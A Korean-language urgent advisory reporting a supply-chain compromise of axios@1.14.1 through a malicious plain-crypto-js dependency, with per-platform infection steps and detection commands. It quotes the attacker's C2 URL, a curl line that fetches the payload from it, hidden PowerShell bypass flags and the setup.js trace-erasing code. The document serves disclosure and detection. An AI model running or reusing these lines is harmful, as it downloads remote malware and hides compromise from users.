⚠️⚠️⚠️ 긴급 공지 ⚠️⚠️⚠️ 특히 Node.js에서 axios 라이브러리를 사용하는 개발자 여러분, axios 버전을 확인해 주시기 바랍니다. 이 공지는 개발자뿐만 아니라 Codex, Claude Code와 같은 AI CLI를 사용하거나 Open Web Search와 같은 MCP를 호출하는 사용자에게도 해당됩니다. npx를 통해 최신 버전을 설치할 경우 axios@1.14.1 버전이 설치됩니다. 이 버전은 공급망 오염 공격에 취약합니다. 악성 패키지 │ plain-crypto-js@4.2.1 (crypto-js로 위장) 오염된 axios │ axios@1.14.1 (plain-crypto-js 종속성 추가) 영향을 받는 MCP │ Open Web Search 및 exa-mcp-server의 npx 캐시 악성 행위 │ PowerShell을 wt.exe로 복사하고, 원격 페이로드를 실행한 후 자체 삭제합니다. 상세 공격 행위 설명 C2 서버: http:/sfrclak.com:8000/6202033 세 가지 플랫폼 전체에 대한 공격 Windows: 1. PowerShell에서 powershell.exe 경로를 찾습니다. 2. powershell.exe를 복사합니다. C:\ProgramData\wt.exe (Windows 터미널로 위장됨) 3. %TEMP%\6202033.vbs에 VBScript를 작성합니다. - curl을 사용하여 C2에서 페이로드를 다운로드합니다. `curl -s -X POST -d "packages.npm.org/product1" "http:/sfrclak.com:8000/6202033"` - .ps1 파일로 저장합니다. - 숨겨진 창에서 실행되는 위장된 PowerShell 스크립트를 사용합니다. `-w hidden -ep bypass` - 실행 후 .ps1 파일을 삭제합니다. 4. cscript를 사용하여 VBS 스크립트를 시스템 프로세스로 위장하여 실행한 후, 실행 후 VBS 파일을 삭제합니다. macOS: 1. curl을 사용하여 C2에서 바이너리 파일을 /Library/Caches/com.apple.act.mond에 다운로드합니다. (시스템 프로세스로 위장) 2. `chmod` 명령으로 권한을 부여합니다. 770 3. 백그라운드에서 실행한 후 C2에 다시 연결합니다. 4. osascript(AppleScript)를 통해 실행한 후 추적 정보를 삭제합니다. Linux: 1. curl을 사용하여 C2에서 Python 스크립트를 /tmp/ld.py로 다운로드합니다. 2. nohup을 사용하여 백그라운드에서 실행한 후 C2에 다시 연결합니다. 최종 추적 정보 삭제 // setup.js 자체를 삭제합니다. fs.unlink(__filename, (x=>{})); // package.md의 이름을 package.json로 변경하고, 원래의 package.json를 덮어씁니다. postinstall fs.rename("package.md", "package.json", (x=>{})); 심지어 package.json도 교체되었으며, postinstall 종속성 검사에서는 postinstall이 존재했다는 기록이 나타나지 않습니다. 빠른 문제 해결: npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4" grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4" plain-crypto-js에서 다음을 확인하십시오. ls node_modules/plain-crypto-js 2>/dev/null && echo "잠재적으로 영향을 받음" 프로그램 setup.js이 실행된 경우, package.json 이 디렉터리의 내용은 깨끗한 스텁 파일로 대체됩니다. 이 디렉터리가 존재한다는 것만으로도 디스펜서가 실행되었다는 충분한 증거입니다. 영향을 받은 시스템에서 RAT 추적을 확인하십시오. # macOS ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "손상됨" # Linux ls -la /tmp/ld.py 2>/dev/null && echo "손상됨":: Windows (cmd.exe) dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED 이것은 24시간도 채 되지 않은 시점(2026년 3월 31일)에 발생한 제로데이 공급망 공격이며, npm과 보안 커뮤니티에서 아직 공개적으로 발표되지 않았습니다.